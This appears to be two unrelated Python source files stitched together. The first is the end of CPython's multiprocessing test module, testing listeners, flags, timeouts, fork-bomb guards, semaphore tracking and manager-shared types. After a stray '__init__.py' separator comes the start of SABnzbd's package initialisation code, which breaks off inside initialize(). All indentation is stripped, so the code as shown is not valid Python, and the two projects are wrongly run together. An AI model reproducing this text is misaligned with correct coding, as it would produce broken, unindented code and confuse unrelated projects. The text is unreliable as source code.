# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with contextlib.ExitStack() as stack:
if should_die:
stack.enter_context(self.assertWarnsRegex(
UserWarning,
"semaphore_tracker: process died"))
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
__init__.py
|
#!/usr/bin/python3 -OO
# Copyright 2007-2019 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# Imported to be referenced from other files directly
from sabnzbd.version import __version__, __baseline__
import os
import logging
import datetime
import tempfile
import pickle
import gzip
import subprocess
import time
import socket
import cherrypy
import sys
import re
import ssl
from threading import Lock, Thread
##############################################################################
# Determine platform flags
##############################################################################
WIN32 = DARWIN = FOUNDATION = WIN64 = False
KERNEL32 = None
if os.name == "nt":
WIN32 = True
from util.apireg import del_connection_info
try:
import ctypes
KERNEL32 = ctypes.windll.LoadLibrary("Kernel32.dll")
except:
pass
elif os.name == "posix":
ORG_UMASK = os.umask(18)
os.umask(ORG_UMASK)
import platform
if platform.system().lower() == "darwin":
DARWIN = True
# 12 = Sierra, 11 = ElCaptain, 10 = Yosemite, 9 = Mavericks, 8 = MountainLion
DARWIN_VERSION = int(platform.mac_ver()[0].split(".")[1])
try:
import Foundation
import sabnzbd.utils.sleepless as sleepless
FOUNDATION = True
except:
pass
# Now we can import safely
from sabnzbd.nzbqueue import NzbQueue
from sabnzbd.postproc import PostProcessor
from sabnzbd.downloader import Downloader
from sabnzbd.assembler import Assembler
from sabnzbd.rating import Rating
import sabnzbd.misc as misc
import sabnzbd.filesystem as filesystem
import sabnzbd.powersup as powersup
from sabnzbd.dirscanner import DirScanner, process_nzb_archive_file, process_single_nzb
from sabnzbd.urlgrabber import URLGrabber
import sabnzbd.scheduler as scheduler
import sabnzbd.rss as rss
import sabnzbd.emailer as emailer
from sabnzbd.articlecache import ArticleCache
import sabnzbd.newsunpack
import sabnzbd.encoding as encoding
import sabnzbd.config as config
from sabnzbd.bpsmeter import BPSMeter
import sabnzbd.cfg as cfg
import sabnzbd.database
import sabnzbd.lang as lang
import sabnzbd.par2file as par2file
import sabnzbd.api
import sabnzbd.interface
import sabnzbd.nzbstuff as nzbstuff
import sabnzbd.directunpacker as directunpacker
from sabnzbd.decorators import synchronized
from sabnzbd.constants import (
NORMAL_PRIORITY,
VALID_ARCHIVES,
REPAIR_REQUEST,
QUEUE_FILE_NAME,
QUEUE_VERSION,
QUEUE_FILE_TMPL,
)
import sabnzbd.getipaddress as getipaddress
LINUX_POWER = powersup.HAVE_DBUS
START = datetime.datetime.now()
MY_NAME = None
MY_FULLNAME = None
RESTART_ARGS = []
NEW_VERSION = (None, None)
DIR_HOME = None
DIR_APPDATA = None
DIR_LCLDATA = None
DIR_PROG = None
DIR_INTERFACES = None
DIR_LANGUAGE = None
DIR_PID = None
QUEUECOMPLETE = None # stores the nice name of the action
QUEUECOMPLETEACTION = None # stores the name of the function to be called
QUEUECOMPLETEARG = None # stores an extra arguments that need to be passed
DAEMON = None
LOGFILE = None
WEBLOGFILE = None
LOGHANDLER = None
GUIHANDLER = None
LOG_ALL = False
AMBI_LOCALHOST = False
WIN_SERVICE = None # Instance of our Win32 Service Class
BROWSER_URL = None
CMDLINE = "" # Rendering of original command line arguments
CERTIFICATE_VALIDATION = True
NO_DOWNLOADING = False # When essentials are missing (SABYenc/par2/unrar)
WEB_DIR = None
WEB_DIR_CONFIG = None
WIZARD_DIR = None
WEB_COLOR = None
SABSTOP = False
RESTART_REQ = False
PAUSED_ALL = False
TRIGGER_RESTART = False # To trigger restart for Scheduler, WinService and Mac
WINTRAY = None # Thread for the Windows SysTray icon
WEBUI_READY = False
LAST_WARNING = None
LAST_ERROR = None
EXTERNAL_IPV6 = False
LAST_HISTORY_UPDATE = 1
# Performance measure for dashboard
PYSTONE_SCORE = 0
DOWNLOAD_DIR_SPEED = 0
COMPLETE_DIR_SPEED = 0
INTERNET_BANDWIDTH = 0
__INITIALIZED__ = False
__SHUTTING_DOWN__ = False
##############################################################################
# Signal Handler
##############################################################################
def sig_handler(signum=None, frame=None):
global SABSTOP, WINTRAY
if sabnzbd.WIN32 and signum is not None and DAEMON and signum == 5:
# Ignore the "logoff" event when running as a Win32 daemon
return True
if signum is not None:
logging.warning(T("Signal %s caught, saving and exiting..."), signum)
try:
save_state()
sabnzbd.zconfig.remove_server()
finally:
if sabnzbd.WIN32:
from util.apireg import del_connection_info
del_connection_info()
if sabnzbd.WINTRAY:
sabnzbd.WINTRAY.terminate = True
time.sleep(0.5)
else:
pid_file()
SABSTOP = True
os._exit(0)
##############################################################################
# Initializing
##############################################################################
INIT_LOCK = Lock()
def get_db_connection(thread_index=0):
# Create a connection and store it in the current thread
if not (hasattr(cherrypy.thread_data, "history_db") and cherrypy.thread_data.history_db):
cherrypy.thread_data.history_db = sabnzbd.database.HistoryDB()
return cherrypy.thread_data.history_db
@synchronized(INIT_LOCK)
def initialize(pause_downloader=False, clean_up=False, evalSched=False, repair=0):
global __INITIALIZED__, __SHUTTING_DOWN__, LOGFILE, WEBLOGFILE, LOGHANDLER, GUIHANDLER, AMBI_LOCALHOST, WAITEXIT, DAEMON, MY_NAME, MY_FULLNAME, NEW_VERSION, DIR_HOME, DIR_APPDATA, DIR_LCLDATA, DIR_PROG, DIR_INTERFACES, DARWIN, RESTART_REQ
if __INITIALIZED__:
return False
__SHUTTING_DOWN__ = False
# Set global database connection for Web-UI threads
cherrypy.engine.subscribe("start_thread", get_db_connection)
# Paused?
pause_downloader = pause_downloader or cfg.start_paused()
# Clean-up, if requested
if clean_up:
# New admin folder
filesystem.remove_all(cfg.admin_dir.get_path(), "*.sab")
# Optionally wait for "incomplete" to become online
if cfg.wait_for_dfolder():
wait_for_download_folder()
else:
cfg.download_dir.set(cfg.download_dir(), create=True)
cfg.download_dir.set_create(True)
# Set access rights for "incomplete" base folder
filesystem.set_permissions(cfg.download_dir.get_path(), recursive=False)
# If dirscan_dir cannot be created, set a proper value anyway.
# Maybe it's a network path that's temporarily missing.
path = cfg.dirscan_dir.get_path()
if not os.path.exists(path):
filesystem.create_real_path(cfg.dirscan_dir.ident(), "", path, False)
# Set call backs for Config items
cfg.cache_limit.callback(new_limit)
cfg.cherryhost.callback(guard_restart)
cfg.cherryport.callback(guard_restart)
cfg.web_dir.callback(guard_restart)
cfg.web_color.callback(guard_restart)
cfg.username.callback(guard_restart)
cfg.password.callback(guard_restart)
cfg.log_dir.callback(guard_restart)
cfg.https_port.callback(guard_restart)
cfg.https_cert.callback(guard_restart)
cfg.https_key.callback(guard_restart)
cfg.enable_https.callback(guard_restart)
cfg.top_only.callback(guard_top_only)
cfg.pause_on_post_processing.callback(guard_pause_on_pp)
cfg.quota_size.callback(guard_quota_size)
cfg.quota_day.callback(guard_quota_dp)
cfg.quota_period.callback(guard_quota_dp)
cfg.language.callback(guard_language)
cfg.enable_https_verification.callback(guard_https_ver)
guard_https_ver()
# Set cache limit
if not cfg.cache_limit() or (cfg.cache_limit() in ("200M", "450M") and (sabnzbd.WIN32 or sabnzbd.DARWIN)):
cfg.cache_limit.set(misc.get_cache_limit())
ArticleCache.do.new_limit(cfg.cache_limit.get_int())
check_incomplete_vs_complete()
# Set language files
lang.set_locale_info("SABnzbd", DIR_LANGUAGE)
lang.set_language(cfg.language())
sabnzbd.api.clear_trans_cache()
sabnzbd.change_queue_complete_action(cfg.queue_complete(), new=False)
# One time conversion "speedlimit" in schedules.
